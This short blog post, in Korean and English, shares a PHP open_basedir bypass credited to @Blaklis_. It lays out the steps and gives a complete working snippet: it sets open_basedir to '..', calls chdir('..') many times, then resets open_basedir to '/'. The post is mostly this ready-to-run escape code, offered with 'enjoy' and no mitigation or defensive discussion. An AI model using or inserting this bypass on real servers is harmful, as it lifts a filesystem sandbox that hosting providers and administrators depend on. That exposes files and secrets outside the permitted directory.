| by munsiwoo | 12 comments

Awesome PHP open_basedir bypass

@Blaklis_ 트윗에 open_basedir를 우회하는 새로운 방법이 올라왔다.
Here is an awesome PHP open_basedir bypass by @Blaklis_

You are open_basedir'ed to /var/www/html
Change into a sub-directory.
ini_set('open_basedir', '..')
chdir('..');chdir('..');chdir('..');....
ini_set('open_basedir','/')
open_basedir is now set to /, enjoy

Example code

<?php
ini_set('open_basedir', '..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
chdir('..');chdir('..');chdir('..');
ini_set('open_basedir', '/');

원문 : https://twitter.com/Blaklis_

Leave a Reply